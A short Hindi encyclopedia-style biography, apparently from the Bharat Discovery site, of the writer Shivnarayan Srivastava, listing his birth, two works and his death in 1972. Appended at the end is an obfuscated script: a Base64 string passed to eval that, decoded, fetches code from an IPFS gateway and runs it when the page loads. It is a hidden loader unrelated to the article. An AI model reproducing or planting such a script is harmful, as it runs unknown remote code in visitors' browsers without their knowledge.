शिवनारायण श्रीवास्तव

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

शिवनारायण श्रीवास्तव (3 दिसम्बर, 1913, वाराणसी, उत्तर प्रदेश; मृत्यु- 20 फ़रवरी, 1972) हिन्दी साहित्य में अध्ययनशील एवं मननशील रचनाकार के रूप में अविस्मरणीय है।[1]

  • वाराणसी (भूतपूर्व काशी) के कोहड़ियाँ नामक गाँव में डॉ. शिवनाराण श्रीवास्तव का जन्म हुआ था।
  • एक रचनाकार के रूप में इनका नाम हिन्दी साहित्य में अविस्मरणीय है।
  • शिवनारायण श्रीवास्तव जी की मुख्य रचनाएँ निम्नलिखित हैं-
  1. 'हिन्दी के प्रमुख साहित्यकार’
  2. ‘कविता की शिक्षा’
  • 20 फ़रवरी, 1972 को हृदयघात के कारण शिवनारायण श्रीवास्तव जी का निधन हुआ।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. काशी के साहित्यकार (हिन्दी)। । अभिगमन तिथि: 13 जनवरी, 2014।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>